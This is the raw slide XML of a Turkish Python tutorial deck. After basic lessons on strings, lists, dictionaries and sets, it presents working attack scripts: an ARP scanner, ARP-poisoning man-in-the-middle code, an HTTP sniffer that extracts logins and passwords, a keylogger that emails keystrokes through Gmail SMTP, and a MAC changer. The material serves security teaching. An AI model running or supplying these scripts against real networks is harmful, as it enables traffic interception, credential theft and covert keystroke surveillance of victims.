                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>tanımlanır.Kullanımları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1500" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> hakkında </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1500" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>pypi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1500" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> sitesinden bilgi alabiliriz.</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR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#1)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arp_request</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR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#2)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broadcast</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR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tr-TR" sz="1500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tr-TR" sz="1500" dirty="0" err="1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tr-TR" sz="1500" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>  -&gt; Yapılacak işlem sırası bu şekildedir.</a:t>
            </a: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get_user_input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1500" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>():   -&gt; Kullanıcı bilgilerini alır.</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR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parse_object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optparse.OptionParser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parse_object.add_option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("-i","--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",dest="ip_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user_input,arguments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parse_object.parse_args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not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user_input.ip_address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Adress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500" dirty="0" err="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>user_input</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR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355976" y="332656"/>
            <a:ext cx="4536504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scan_my_networkd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(ip):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arp_request_packet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scapy.ARP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pdst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=ip) #ARP PAKETİ OLUŞTURDUK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#scapy.ls(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scapy.ARP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()) #ARP ile ilgili çıktılar alınabilir.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broadcast_packet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scapy.Ether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ff:ff:ff:ff:ff:ff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#scapy.ls(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scapy.Ether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()) #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Ether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ile ilgili çıktılar alınabilir.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combined_packet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broadcast_packet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arp_request_packet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#2 paketi bir paket haline getirir.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answered_list,unanswered_list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scapy.srp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combined_packet,timeout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=1)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answered_list.summary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 #Özet gösterme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metoduna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özel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user_ip_address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get_user_input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scan_my_networkd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user_ip_address.ip_address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Yazdığımız kod sonucunda ağ içi tarama yapan bir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elde ettik.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505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5976664" cy="530961"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="3500" dirty="0" smtClean="0"/>
              <a:t>Man in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="3500" dirty="0" err="1" smtClean="0"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="3500" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="3500" dirty="0" err="1" smtClean="0"/>
              <a:t>middle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7504" y="692696"/>
            <a:ext cx="4464496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MITM : Saldırganın birbiri ile doğrudan iletişim kuran iki taraf arasındaki iletişimi gizlice ilettiği veya değiştirdiği saldırı türüdür.</a:t>
            </a:r>
          </a:p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#Kütüphaneler tanımlandı.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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scapy.all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time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optparse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#Modemin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cihaz,cihazın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ise modem olarak algılamasını sağlamaya çalışıyoruz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get_mac_address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(ip):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arp_request_packet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scapy.ARP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pdst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=ip) #ARP PAKETİ OLUŞTURDUK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broadcast_packet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scapy.Ether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dst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ff:ff:ff:ff:ff:ff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combined_packet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broadcast_packet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arp_request_packet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#2 paketi bir paket haline getirir.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answered_list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scapy.srp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combined_packet,timeout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=1,verbose=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)[0]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#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answered_list.summary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 #Özet gösterme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metoduna özel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answered_list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[0][1].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hwsrc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  #Mac adresini geri döndürür.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499992" y="692696"/>
            <a:ext cx="4464496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arp_poisoning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target_ip,modem_ip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get_mac_address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arp_response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scapy.ARP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(op=2,pdst=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target_ip,hwdst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target_mac,psrc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modem_ip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scapy.send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arp_response,verbose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 #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Verbose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sürekli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mesajı göndermesini engeller.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#scapy.ls(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scapy.ARP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()) #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op,pdst,hwdst,psrc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gibi değerleri görmemizi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sağlar.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone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reset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(target1_ip,modem1_ip):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get_mac_address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(target1_ip)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gateway_mac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get_mac_address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(modem1_ip)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arp_response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scapy.ARP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(op=2,pdst=target1_ip,hwdst=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target_mac,psrc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=modem1_ip,hwsrc=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gateway_mac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scapy.send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arp_response,verbose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2558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512" y="260649"/>
            <a:ext cx="4820301" cy="576064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="3500" dirty="0" smtClean="0"/>
              <a:t>MITM DEVAM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680520" cy="563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get_user_input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parse_object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optparse.OptionParser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parse_object.add_option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("-t","--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",dest="target_ip",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IP")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parse_object.add_option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("-g","--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gateway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",dest="gateway_ip",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Gateway IP")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options,argumenys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parse_object.parse_args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()[0]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not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options.target_ip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IP")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not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options.gateway_ip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Gateway IP")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options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=0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user_ips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get_user_input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user_target_ip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user_ips.target_ip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user_gateway_ip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user_ips.gateway_ip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options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499992" y="332656"/>
            <a:ext cx="4392488" cy="6277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=0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user_ips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get_user_input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user_target_ip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user_ips.target_ip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user_gateway_ip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user_ips.gateway_ip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True:  #Sonsuz döngü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arp_poisoning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user_target_ip,user_gateway_ip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arp_poisoning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user_gateway_ip,user_target_ip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+=1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rSending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packets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"+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="")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time.sleep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(3) #Döngüye girmeden 3 saniye bekliyor.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KeyboardInterrupt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nQuit&amp;Reset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reset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user_target_ip,user_gateway_ip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reset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user_gateway_ip,user_target_ip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954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116633"/>
            <a:ext cx="4820301" cy="576063"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="3500" dirty="0" smtClean="0"/>
              <a:t>Paket Dinleyici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79512" y="908720"/>
            <a:ext cx="7920880" cy="5775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#Bu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MITM ile kullanılmalıdır.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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scapy.all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scapy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scapy_http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http</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="tr-T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listen_packets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scapy.sniff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iface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interface,store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False,prn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analyze_packets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#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prn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callback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function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analyze_packets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packet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#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packet.show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packet.haslayer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http.HTTPRequest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): #Paket Kontrolü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packet.haslayer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scapy.Raw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): #Katman Filtreleme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packet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scapy.Raw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) ##Kullanıcı adı ve şifre kısmını çektik.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/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indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>listen_packets</a:t>
            </a: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("eth0")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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430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179512" y="188641"/>
            <a:ext cx="6624736" cy="576063"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="3500" dirty="0" err="1" smtClean="0"/>
              <a:t>Keylogger</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="3500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79512" y="836712"/>
            <a:ext cx="4392488" cy="5847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-Bilgisayar kullanan herkesin aşina olduğu bu terim kurbanın klavyede bastığı tüm değerleri bize aktarmaktadır.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pynput.keyboard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smtplib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threading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""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callback_function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global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key.char.encode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("utf-8") #Türkçe karakterleri ekledik.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#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key.char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AttributeError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key.space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+ " "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else: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4716016" y="188640"/>
            <a:ext cx="4176464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send_email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email,passw,message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email_server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smtplib.SMTP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("smtp.gmail.com",587) #Google'ın verileri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email_server.starttls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email_server.login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email,passw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email_server.sendmail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email,email,message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email_server.quit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threading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thread_func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global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send_email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("Deneme123@gmail.com","123123123",log)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" "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timer_object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threading.Timer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(30,thread_func) #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Keylogger_listener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ile düzenli bir şekilde çalışması için yazdık.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timer_object.start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keylogger_listener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pynput.keyboard.Listener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on_press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callback_function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keylogger_listener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keylogger_listener.join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25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7488832" cy="720080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 err="1" smtClean="0"/>
              <a:t>String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5077623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-X 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” -&gt; Şeklinde yine türünü belirtmeden tanımlama yapabiliriz.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-Ayrıca tanımladığımız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Stringi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(x) komutu ile yazdırabiliriz.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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) komutu ile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stringin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uzunluğunu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bulabiliriz.Burada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boşluklarıda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sayacağını unutmamalıyız.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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-“\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n”  = Bir satır boşluk bırakır. – “\t”  = Bir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boşluk bırakır.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1146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512" y="23737"/>
            <a:ext cx="3384376" cy="620687"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="3500" dirty="0" smtClean="0"/>
              <a:t>Mac Değiştirici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468052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subprocess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optparse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re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get_user_input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parse_object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optparse.OptionParser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parse_object.add_option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("-i","--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",dest="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!")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parse_object.add_option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("-m","--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",dest="mac_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parse_object.parse_args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change_mac_address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user_interface,user_mac_adress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subprocess.call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(["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ifconfig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",user_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,"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"])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subprocess.call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(["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ifconfig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",user_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,"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hw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ether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user_mac_adress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subprocess.call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(["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ifconfig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",user_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,"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"])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860032" y="116632"/>
            <a:ext cx="4176464" cy="659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control_new_mac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ifconfig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subprocess.check_output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(["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ifconfig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new_mac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re.search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(r"\w\w:\w\w:\w\w:\w\w:\w\w:\w\w",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ifconfig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new_mac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new_mac.group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None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MyMacChanger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started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!")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user_input,arguments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get_user_input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change_mac_address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user_input.interface,user_input.mac_address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finalized_mac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control_new_mac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user_input.interface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finalized_mac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user_input.mac_address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!")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175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332657"/>
            <a:ext cx="8136904" cy="864096"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="3500" dirty="0" err="1" smtClean="0"/>
              <a:t>String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="3500" dirty="0" smtClean="0"/>
              <a:t> Index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8136904" cy="50776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 = “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World”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[0] = ‘h’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[4] = ‘o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR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[-1] = ‘d’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My_nstring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= ‘1234567890’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My_nstring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[2:] = ‘34567890’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My_nstring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[:4]= ‘1234’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My_nstring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[::]  = “1234567890”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My_nstring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[::3] = “1470”  //3’er  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3’er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saydırmamıza olanak sağlar.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My_nstring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[::-1]=”0987654321” //Tersten saydırır.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0201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064953" cy="764704"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="3500" dirty="0" err="1" smtClean="0"/>
              <a:t>String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="3500" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="3500" dirty="0" err="1" smtClean="0"/>
              <a:t>Methods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8136904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My_name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= “Kaan”           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derleyici üzerinde yazarken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tuşu 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ile tamamlama yapabiliriz.</a:t>
            </a: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My_name.capitalize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() = “Kaan” </a:t>
            </a:r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My_name.isnumeric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() = “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”        //Numaralardan oluşup oluşmadığını sorgulayabiliriz.</a:t>
            </a:r>
          </a:p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My_name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= “Kaan Efe Öğüt”</a:t>
            </a:r>
          </a:p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My_name.split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() = [‘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Kaan’,’Efe’,’Öğüt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’]  //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Stringleri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parçalamamıza olanak sağlar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Diğer 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dillerden farklı olarak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Stringler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üzerinde çarpma ve toplama işlemi yapabiliriz.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james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”  *10  // 10 Kere James yazdırır.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james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” + “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lars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”  = ‘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jameslars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’    //İki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stringi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tek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haline getirebiliriz.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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97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80920" cy="936104"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="3500" dirty="0" err="1" smtClean="0"/>
              <a:t>Lists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196752"/>
            <a:ext cx="7992888" cy="55096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=[1,2,3]               //Şeklinde tanımlanır.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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[0] = 1                 //</a:t>
            </a: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 ve dizilerde olduğu gibi 0.Indexten başlar.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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My_list.append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 komutu ile listeye ekleme yapabiliriz.”</a:t>
            </a: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my_list.append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(8)”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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My_list.pop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 komutu ile son eklenen değeri listeden çıkarabiliriz.”</a:t>
            </a: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my_list.pop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()”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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My_mixlist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 = [1,2,”a”,”b”]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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My_mixlist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[-1] = b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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My_mixlist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[-2] =  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="3600" dirty="0" smtClean="0"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lang="tr-TR" sz="36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My_list1 = [“</a:t>
            </a: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a”,”b”,”c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”]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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My_list2 = [“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="3600" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>d”,”e”,f</a:t>
            </a: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”]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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My_list3 = my_list1 + my_list2         İki listeyi bu kadar basit bir şekilde birleştirebiliriz.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" sz="3600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>My_list1*3 komutu ile de aynı listeyi 3 defa yazdırabiliriz.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1781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7584" y="1628800"/>
            <a:ext cx="7560840" cy="864096"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="3500" dirty="0" err="1" smtClean="0"/>
              <a:t>Nested</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="3500" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="3500" dirty="0" err="1" smtClean="0"/>
              <a:t>List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1412776"/>
            <a:ext cx="7776864" cy="5077623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= [1,4,”a”,[3,”c”]]     //İçerisine bu şekilde tek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indexte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tutulup çift değer taşıyan eleman tanımlanabilir.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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] = [3,”c”]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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-Burada 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stringlerde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olduğu gibi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[2:] veya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[:2] şeklinde kullanım vardır.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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5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0"/>
            <a:ext cx="7704856" cy="867052"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="3500" dirty="0" smtClean="0"/>
              <a:t>Dictionary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241376"/>
            <a:ext cx="8568952" cy="5616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İki tabloyu eşleştirmek yerine sözlük kullanılır.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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My_f_d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 = {“run”:100,”swim”:200}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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My_f_d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[“</a:t>
            </a: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”] çalıştırdığımda bana 100 değerini döndürür.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="tr-TR" sz="20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000" dirty="0" smtClean="0"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Genellikle anahtar kelime ile tutulurlar.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My_f_d2={“key1”:1,”key2”:2,”key3”: ”</a:t>
            </a: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”}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My_f_d2=[“key3”] çalıştırıldığında ‘</a:t>
            </a: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’ sonucunu döndürür.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My_d3 = {“key1” : 10 , 20 :30} şeklinde de bir tanımla yapılabilir.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My_d3[20]  çalıştırdığımızda 30 değerini döndürür. </a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="20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Tanımlı olan sözlükteki </a:t>
            </a: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keyleri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 görmek için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My_d4.keys() komutu kullanılır.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Ayrıca my_d4 komutu ile sözlük içerisinde ki değerlerin hepsi görüntülenebilir.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-my_d4[“key3”][“a”] komutu ile de sözlük içerisine ekleme yapılabilir.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My_dict_2 = </a:t>
            </a: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() komutu ile boş bir </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>dictionary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> oluşturulabilir.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="tr-TR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10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5064953" cy="648073"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="3500" dirty="0" smtClean="0"/>
              <a:t>SET</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="3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980728"/>
            <a:ext cx="8424936" cy="50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-Diğer yazım dillerinde bulunmayan bir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komuttur.Bu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komut ile liste içerisinde tekrar eden değerleri yok edebiliriz.</a:t>
            </a:r>
          </a:p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= [1,2,3,1]</a:t>
            </a:r>
          </a:p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My_set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= set(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) komutu ile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my_list’i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set ediyorum.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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My_set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yazdığımda {1,2,3} değerini döndürür.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My_set2 = {1,2,3,4}  //Süslü parantezle yazılır.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Ayrıca my_set3 = set()  şeklinde boş bir set oluşturulup;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My_set3.add(1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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My_set3.add(2)    //Komutuyla ekleme yapılabilir.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="466650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TM01859865[[fn=Kilter]]</Template>
  <TotalTime>394</TotalTime>
  <Words>2721</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Ekran Gösterisi (4:3)</PresentationFormat>
  <Paragraphs>538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Kilter</vt:lpstr>
      <vt:lpstr>PYTHON TUTORİAL</vt:lpstr>
      <vt:lpstr>Variables(Değişkenler)</vt:lpstr>
      <vt:lpstr>String</vt:lpstr>
      <vt:lpstr>String Index</vt:lpstr>
      <vt:lpstr>String Methods</vt:lpstr>
      <vt:lpstr>Lists</vt:lpstr>
      <vt:lpstr>Nested List</vt:lpstr>
      <vt:lpstr>Dictionary</vt:lpstr>
      <vt:lpstr>SET</vt:lpstr>
      <vt:lpstr>Tuple</vt:lpstr>
      <vt:lpstr>IF Syntax</vt:lpstr>
      <vt:lpstr>IF ÖRNEK</vt:lpstr>
      <vt:lpstr>For</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>Continue,Break,Pass</vt:lpstr>
      <vt:lpstr>While</vt:lpstr>
      <vt:lpstr>Kullanışlı Metotlar</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>Fonksiyon metotları</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>CLASS : OOP</vt:lpstr>
      <vt:lpstr>Special Methods</vt:lpstr>
      <vt:lpstr>Try-Except-Finally</vt:lpstr>
      <vt:lpstr>Dosya İşlemleri</vt:lpstr>
      <vt:lpstr>NET SCANNER</vt:lpstr>
      <vt:lpstr>Man in the middle</vt:lpstr>
      <vt:lpstr>MITM DEVAM</vt:lpstr>
      <vt:lpstr>Paket Dinleyici</vt:lpstr>
      <vt:lpstr>Keylogger</vt:lpstr>
      <vt:lpstr>Mac Değiştirici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TUTORİAL</dc:title>
  <dc:creator>EFE ÖĞÜT</dc:creator>
  <cp:lastModifiedBy>EFE ÖĞÜT</cp:lastModifiedBy>
  <cp:revision>51</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-10-29T09:32:36Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-10-30T12:57:58Z</dcterms:modified>
</cp:coreProperties>
</file>